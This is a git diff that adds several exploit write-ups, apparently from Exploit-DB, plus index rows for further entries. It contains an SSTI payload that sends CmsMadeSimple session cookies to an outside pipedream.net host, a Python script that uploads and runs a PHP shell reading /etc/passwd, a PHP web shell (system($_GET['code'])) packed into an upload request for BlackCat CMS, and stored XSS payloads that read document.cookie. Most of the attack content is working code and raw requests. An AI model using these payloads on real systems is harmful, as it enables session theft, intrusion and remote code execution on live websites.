+Content-Length: 988
+sec-ch-ua:
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd
+Connection: close
+
+mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1
+
+Poc Video: https://youtu.be/zq3u3jRpfqM
\ No newline at end of file
diff --git a/exploits/php/webapps/51600.txt b/exploits/php/webapps/51600.txt
new file mode 100644
index 000000000..0dfb173d3
--- /dev/null
+++ b/exploits/php/webapps/51600.txt
@@ -0,0 +1,63 @@
+#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
+#Application: CmsMadeSimple
+#Version: v2.2.17
+#Bugs:  Remote Code Execution(RCE)
+#Technology: PHP
+#Vendor URL: https://www.cmsmadesimple.org/
+#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
+#Date of found: 12-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+
+import requests
+
+login_url = 'http://localhost/admin/login.php'
+username=input('username = ')
+password=input('password = ')
+
+
+upload_url = 'http://localhost/admin/moduleinterface.php'
+
+file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?>  : ")
+#phar file content """"<?php echo system('cat /etc/passwd') ?>"""""
+
+login_data = {
+    'username': username,
+    'password': password,
+    'loginsubmit': 'Submit'
+}
+
+
+session = requests.Session()
+response = session.post(login_url, data=login_data)
+
+
+if response.status_code == 200:
+    print('Login account')
+else:
+    print('Login promlem.')
+    exit()
+
+
+files = {
+    'm1_files[]': open(file_path, 'rb')
+}
+
+data = {
+    'mact': 'FileManager,m1_,upload,0',
+    '__c': session.cookies['__c'],
+    'disable_buffer': '1'
+}
+
+
+response = session.post(upload_url, files=files, data=data)
+
+
+if response.status_code == 200:
+    print('file upload')
+    rce_url=f"http://localhost/uploads/{file_path}"
+    rce=requests.get(rce_url)
+    print(rce.text)
+else:
+    print('file not upload')
\ No newline at end of file
diff --git a/exploits/php/webapps/51601.txt b/exploits/php/webapps/51601.txt
new file mode 100644
index 000000000..5b2580641
--- /dev/null
+++ b/exploits/php/webapps/51601.txt
@@ -0,0 +1,47 @@
+#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
+#Application: CmsMadeSimple
+#Version: v2.2.17
+#Bugs:  Stored Xss
+#Technology: PHP
+#Vendor URL: https://www.cmsmadesimple.org/
+#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
+#Date of found: 12-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+1. Login to account
+2. Go to Content Manager
+3. Add New Content
+4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section
+
+payload: <img src=x onerror=alert(document.cookie)>
+
+5. Submit Content
+6. Visit Content (http://localhost/index.php?page=test)
+
+Request:
+
+POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
+Host: localhost
+Content-Length: 584
+sec-ch-ua:
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
+Connection: close
+
+mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51602.txt b/exploits/php/webapps/51602.txt
new file mode 100644
index 000000000..d5b0bf507
--- /dev/null
+++ b/exploits/php/webapps/51602.txt
@@ -0,0 +1,36 @@
+## Title: Statamic 4.7.0 - File-Inclusion
+## Author: nu11secur1ty
+## Date: 07.13.2023
+## Vendor: https://statamic.com/
+## Software: https://demo.statamic.com/
+## Reference: https://portswigger.net/web-security/file-upload
+
+
+## Description:
+The statamic-4.7.0 suffers from file inclusion - file upload vulnerability.
+The attacker can upload a malicious HTML file and can share the
+malicious URL which uses the infected HTML file
+to the other attackers in the network, they easily can look at the
+token session key and can do very dangerous stuff.
+
+
+## Staus: HIGH Vulnerability
+
+[+]Exploit:
+
+```js
+<html>
+	<script>
+		alert(document.cookie);
+	</script>
+</html>
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)
+
+## Time spend:
+01:10:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51604.txt b/exploits/php/webapps/51604.txt
new file mode 100644
index 000000000..87912f45b
--- /dev/null
+++ b/exploits/php/webapps/51604.txt
@@ -0,0 +1,20 @@
+Exploit Title: Blackcat Cms v1.4 - Stored XSS
+Application: blackcat Cms
+Version: v1.4
+Bugs:  Stored XSS
+Technology: PHP
+Vendor URL: https://blackcat-cms.org/
+Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
+Date of found: 13.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. login to account
+2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
+3. set as <img src=x onerror=alert(4)>
+4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51605.txt b/exploits/php/webapps/51605.txt
new file mode 100644
index 000000000..52402acad
--- /dev/null
+++ b/exploits/php/webapps/51605.txt
@@ -0,0 +1,65 @@
+Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
+Application: blackcat Cms
+Version: v1.4
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://blackcat-cms.org/
+Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
+Date of found: 13.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account as admin
+2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
+3. upload zip file but this zip file must contains poc.php
+poc.php file contents
+<?php $a=$_GET['code']; echo system($a);?>
+4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd
+
+Poc request
+
+POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
+Host: localhost
+Content-Length: 577
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
+Connection: close
+
+------WebKitFormBoundaryBRByJwW3CUSHOcBT
+Content-Disposition: form-data; name="upload"
+
+1
+------WebKitFormBoundaryBRByJwW3CUSHOcBT
+Content-Disposition: form-data; name="userfile"; filename="poc.zip"
+Content-Type: application/zip
+
+PKvalsdalsfapoc.php<?php
+$a=$_GET['code'];
+echo system($a);
+?>
+blabalaboalpoc.php
+blablabla
+------WebKitFormBoundaryBRByJwW3CUSHOcBT
+Content-Disposition: form-data; name="submit"
+
+Upload
+------WebKitFormBoundaryBRByJwW3CUSHOcBT--
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 23a589119..1d48cdf65 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3622,6 +3622,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",2022-02-16,LiquidWorm,remote,hardware,,2022-02-16,2022-02-16,0,,,,,,
 32743,exploits/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Vulnerabilities",2014-04-08,"Juan Manuel Garcia",remote,hardware,,2014-04-08,2016-12-18,0,OSVDB-105590;OSVDB-105589;OSVDB-105588;OSVDB-105587;OSVDB-105586;OSVDB-105585;OSVDB-105584;OSVDB-105583,,,,,
 43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/c57ef2ae2447f8ee7e39554de5f51758a15a9580/Herospeed-TelnetSwitch.py
+51607,exploits/hardware/remote/51607.py,"Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution",2023-07-19,"Thurein Soe",remote,hardware,,2023-07-19,2023-07-19,0,CVE-2022-28171,,,,,
 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/tothi/pwn-hisilicon-dvr/blob/42d8325e68fdb075fe27df8a269932f9fa9601a6/pwn_hisilicon_dvr.py
 48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,,2020-02-05,2020-02-05,0,,,,,,
 47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,,2019-09-23,2019-09-23,0,,,,,,
@@ -3998,6 +3999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor Access / Remote Code Execution",2015-07-16,"Pierre Kim",webapps,hardware,,2015-07-16,2016-09-15,0,,,,,,https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
 31261,exploits/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,webapps,hardware,443,2014-01-29,2014-01-29,0,OSVDB-102657,,,,,
 17376,exploits/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-07-24,1,OSVDB-72941,,,,,
+51603,exploits/hardware/webapps/51603.py,"ABB FlowX v4.00 - Exposure of Sensitive Information",2023-07-19,"Paul Smith",webapps,hardware,,2023-07-19,2023-07-19,0,CVE-2023-1258,,,,,
 46132,exploits/hardware/webapps/46132.txt,"Across DR-810 ROM-0 - Backup File Disclosure",2019-01-14,SajjadBnd,webapps,hardware,80,2019-01-14,2019-01-14,0,,,,,,
 44982,exploits/hardware/webapps/44982.txt,"ADB Broadband Gateways / Routers - Authorization Bypass",2018-07-05,"SEC Consult",webapps,hardware,80,2018-07-05,2018-07-05,0,CVE-2018-13109,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 38245,exploits/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,webapps,hardware,,2015-09-20,2015-09-20,0,OSVDB-127902;OSVDB-127901;OSVDB-127900,,,,,http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
@@ -4879,6 +4881,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49092,exploits/hardware/webapps/49092.txt,"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",2020-11-23,malwrforensics,webapps,hardware,,2020-11-23,2020-11-23,0,CVE-2020-24363,,,,,
 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
+51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
 34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware,,2014-08-03,2016-09-12,0,OSVDB-109840;OSVDB-109839,,,,,
 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,,2019-05-21,2019-05-21,0,CVE-2019-12195,"Cross-Site Scripting (XSS)",,,,
@@ -10359,6 +10362,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info
 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,,
 51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,,
+51571,exploits/multiple/local/51571.txt,"Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure",2023-07-06,nu11secur1ty,local,multiple,,2023-07-06,2023-07-19,0,CVE-2023-33145,,,,,
 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f
 44266,exploits/multiple/local/44266.html,"Mozilla Firefox - Address Bar Spoofing",2017-04-14,649,local,multiple,,2018-03-09,2018-03-09,0,CVE-2017-5415,,,,,https://github.com/649/CVE-2017-5415/tree/209b7ae6882a18ae51b1222a68c040a3bc9a8bc5
 10544,exploits/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",local,multiple,,2009-12-17,,1,CVE-2009-1839;OSVDB-55163,,,,,
@@ -14436,6 +14440,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1825,exploits/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,webapps,php,,2006-05-24,,1,OSVDB-25828;CVE-2006-2682,,,,,
 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
+51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
 37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info
@@ -14807,6 +14812,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,,2021-02-16,2021-02-16,0,,,,,,
 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php,,2021-04-21,2021-04-21,0,,,,,,
 48820,exploits/php/webapps/48820.txt,"BlackCat CMS 1.3.6 - Cross-Site Request Forgery",2020-09-21,Noth,webapps,php,,2020-09-21,2020-09-21,0,CVE-2020-25453,,,,,
+51605,exploits/php/webapps/51605.txt,"Blackcat Cms v1.4 - Remote Code Execution (RCE)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
+51604,exploits/php/webapps/51604.txt,"Blackcat Cms v1.4 - Stored XSS",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 38311,exploits/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,webapps,php,,2013-02-12,2015-09-24,1,,,,,,https://www.securityfocus.com/bid/57910/info
 1683,exploits/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,webapps,php,,2006-04-15,,1,OSVDB-24803;CVE-2006-1917,,,,,
 34209,exploits/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' SQL Injection",2010-06-28,S.W.T,webapps,php,,2010-06-28,2014-07-30,1,,,,,,https://www.securityfocus.com/bid/41190/info
@@ -15909,6 +15916,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",2021-10-01,"Halit AKAYDIN",webapps,php,,2021-10-01,2021-10-01,0,,,,,http://www.exploit-db.comCMSimple_XH-1.7.4.zip,
 43075,exploits/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15984,,,,,
 24959,exploits/php/webapps/24959.py,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,webapps,php,,2013-04-15,2013-04-15,0,OSVDB-92326;OSVDB-92325;OSVDB-92324;OSVDB-92323;OSVDB-92322;OSVDB-92321;OSVDB-92320;CVE-2013-3535,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php
+51600,exploits/php/webapps/51600.txt,"CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
+51599,exploits/php/webapps/51599.txt,"CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
+51601,exploits/php/webapps/51601.txt,"CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 2766,exploits/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,webapps,php,,2006-11-11,2016-09-14,1,OSVDB-34029;CVE-2006-7185,,,,http://www.exploit-db.comCMSmelborp.zip,
 9311,exploits/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,webapps,php,,2009-07-29,,1,OSVDB-56646;CVE-2009-3507;OSVDB-56645;OSVDB-56644;CVE-2009-3506,,,,,
 17592,exploits/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,webapps,php,,2011-08-01,2013-12-08,0,OSVDB-74376,,,,,
@@ -21875,6 +21885,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43975,exploits/php/webapps/43975.html,"Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,,2018-02-05,2018-02-05,0,CVE-2018-6604,,,,http://www.exploit-db.compkg_zhyandexmap-j30-6.2.1.0-final.zip,
 12283,exploits/php/webapps/12283.txt,"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php,,2010-04-17,2016-12-20,1,OSVDB-64247;CVE-2010-1602,,,,http://www.exploit-db.comcom_zimbComment081b.zip,
 12284,exploits/php/webapps/12284.txt,"Joomla! Component ZiMBCore 0.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php,,2010-04-17,2016-12-20,1,OSVDB-64248;CVE-2010-1603,,,,http://www.exploit-db.comzimbcore.zip,
+51595,exploits/php/webapps/51595.py,"Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)",2023-07-19,qw3rTyTy,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,,2020-03-30,2020-03-30,0,,,,,,
 48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,,2020-03-23,2020-03-23,0,,,,,,
 44447,exploits/php/webapps/44447.txt,"Joomla! Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,,2018-04-12,2018-04-16,0,CVE-2018-10063,,,,,
@@ -24758,6 +24769,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
+51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-19,0,CVE-2023-37629,,,,,
 51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-09,1,CVE-2023-2246,,,,,
 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 -  SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
@@ -26837,6 +26849,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31844,exploits/php/webapps/31844.txt,"PHPFix 2.0 - '/fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,webapps,php,,2008-05-26,2014-02-23,1,CVE-2008-2479;OSVDB-45643,,,,,https://www.securityfocus.com/bid/29371/info
 8975,exploits/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,webapps,php,,2009-06-16,,1,OSVDB-55195;CVE-2009-2112,,,,,
 26474,exploits/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,webapps,php,,2005-11-07,2013-06-29,1,CVE-2005-4423;OSVDB-22799,,,,,https://www.securityfocus.com/bid/15335/info
+51594,exploits/php/webapps/51594.py,"phpfm v1.7.9 - Authentication type juggling",2023-07-19,thoughtfault,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 17485,exploits/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,webapps,php,,2011-07-04,2011-07-04,1,,,,,,
